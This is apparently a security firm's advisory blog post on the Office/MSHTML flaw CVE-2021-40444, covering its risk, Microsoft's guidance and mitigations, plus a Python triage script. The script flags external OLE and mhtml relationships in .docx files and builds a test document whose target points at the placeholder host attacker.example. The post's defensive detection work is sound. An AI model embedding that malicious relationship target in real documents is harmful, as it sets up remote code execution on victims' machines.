Threat Advisory: Office 365 and Office 2019 on Windows 10

by Security Centric, on 10/09/2021 1:18:32 PM

A troubling new remote code execution vulnerability has been disclosed that affects customers using Office 365 and Office 2019 on Windows 10, and it is already being exploited by malicious actors in targeted attacks.

In non-technical terms, this vulnerability means a malicious actor can send you a booby-trapped Office document (Word, Excel, etc.) by email, or get it to you in another ordinary way (think of a co-worker unknowingly forwarding the malicious file via your internal file-sharing systems). When you open a document that came from the internet, Office opens it in "Protected View", a read-only mode in which you cannot edit, change or save the file and the malicious content does not run. Once you click "Enable Editing", however, the malicious code can execute on your system.

However, security researchers have also tested this vulnerability with files outside the usual Word/Excel/PowerPoint formats, specifically files with a .rtf extension. Since that file type does not get the Protected View safeguard, the malicious code is executed as soon as the file is opened, with no "Enable Editing" click required. There may be additional file types this applies to; details are still emerging.

Security Recommendations for Mitigation:

At the time of writing there is no patch for this vulnerability, so check the Microsoft advisory linked below for updates. Microsoft's advisory does include a workaround: disabling the installation of all ActiveX controls in Internet Explorer, applied through the registry for all security zones, mitigates the attack. It prevents new ActiveX controls from being installed while already-installed controls continue to run, so test it in your environment before rolling it out broadly. Beyond that, there are general mitigation strategies such as ensuring your anti-malware product is up to date, and it is worth getting someone from your security team (or your security provider) to confirm that your endpoint protection is configured to alert you to suspicious files that fit this type of attack.

In general, the advice from our offensive security team is to remind staff within your organisation not to open attachments from unknown sources, and not to open unexpected attachments, particularly if they are unsolicited.

If you're concerned about your security in light of this latest vulnerability, the team at Security Centric can help examine your Office 365 security configuration against best practice. Given that the attack technique typically starts with phishing, and that general good security practice is part of a solid defence, this is a good reminder to refresh or implement simulated phishing and security awareness training for your organisation.

Further information on this vulnerability:

This vulnerability is known as CVE-2021-40444, and the following information was released by Microsoft:
"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep anti-malware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.”

The full advisory from Microsoft can be found here: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
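Microsoft's description above says the malicious document "hosts the browser rendering engine". In the samples described in public analyses of this campaign, that is done through the document's relationship file (word/_rels/document.xml.rels), which points an OLE object at an external URL using the mhtml: scheme with an "!x-usc:" suffix, so that MSHTML fetches the attacker's HTML when the document is opened. The following Python script is an added example, not code from this post or from Microsoft: it unpacks a .docx in memory and flags that pattern. The indicator is assumed from those public analyses, the sample documents it builds are constructed for the demonstration, and the attacker.example hostname is a placeholder. It generalises slightly beyond the mhtml: form by also flagging any OLE object relationship that is external rather than embedded in the package.

```python
"""Triage helper for Office Open XML (.docx) files: flag external OLE
object relationships such as the mhtml: targets described in public
analyses of the CVE-2021-40444 documents.

Added example; not code from the original post or from Microsoft. The
indicator (an oleObject relationship whose Target is an external mhtml:
URL with an "!x-usc:" suffix) is assumed from those public analyses.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE_SUFFIX = "/relationships/oleObject"


def is_suspicious_target(target):
    """MSHTML-style targets: mhtml: scheme or the !x-usc: redirection suffix."""
    t = target.lower()
    return t.startswith("mhtml:") or "!x-usc:" in t


def find_suspicious_rels(docx_bytes):
    """Return [(rels_part, rel_id, target), ...] for risky relationships.

    Flags (a) any OLE object relationship that is External, i.e. the
    object is fetched from a URL rather than stored in the package, and
    (b) any relationship whose Target uses mhtml:/!x-usc:, whatever its
    Type. Embedded objects and ordinary external hyperlinks are not flagged.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            # xml.etree is not hardened against entity-expansion attacks;
            # use defusedxml for production triage of untrusted files.
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                if (external and rtype.endswith(OLE_TYPE_SUFFIX)) or is_suspicious_target(target):
                    findings.append((name, rel.get("Id", ""), target))
    return findings


# --- Constructed sample documents for the demo (not real samples) ---------
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MALICIOUS_TARGET = ("mhtml:http://attacker.example/side.html"
                    "!x-usc:http://attacker.example/side.html")  # placeholder host

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '</Types>'
)
ROOT_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="' + OOXML_REL + 'officeDocument" Target="word/document.xml"/>'
    '</Relationships>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>'
)


def document_rels(extra=""):
    """word/_rels/document.xml.rels with a styles rel, a normal external
    hyperlink and an embedded (internal) OLE object, plus any extra XML."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="' + OOXML_REL + 'styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="' + OOXML_REL + 'hyperlink" Target="https://example.com/" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="' + OOXML_REL + 'oleObject" Target="embeddings/oleObject1.bin"/>'
        + extra +
        '</Relationships>'
    )


BENIGN_RELS = document_rels()
MALICIOUS_RELS = document_rels(
    '<Relationship Id="rId4" Type="' + OOXML_REL + 'oleObject" Target="' + MALICIOUS_TARGET + '" TargetMode="External"/>'
)


def build_docx(rels_xml):
    """Build a minimal in-memory .docx (constructed for this demo)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def scan_path(path):
    """Scan a .docx on disk (run it against a quarantined copy)."""
    with open(path, "rb") as f:
        return find_suspicious_rels(f.read())


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("malicious", MALICIOUS_RELS)):
        print(label, find_suspicious_rels(build_docx(rels)))
```

Run it against a quarantined copy of a suspect file with scan_path. A clean result is not proof of safety: the check only covers the OOXML (zip-based) formats, so the .rtf variant mentioned above is not a zip and will not be caught, and attackers can vary the relationship layout. Treat it as a triage aid alongside, not instead of, up-to-date endpoint protection.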

If you're more technically minded and looking for proofs of concept of the various attack methods, they can be found on Twitter here:

  1. Malicious Microsoft Office document
  2. Malicious .rtf document

Need help with your organisation's cybersecurity? Contact us to discuss how we can help you be more secure and reduce your business risk.
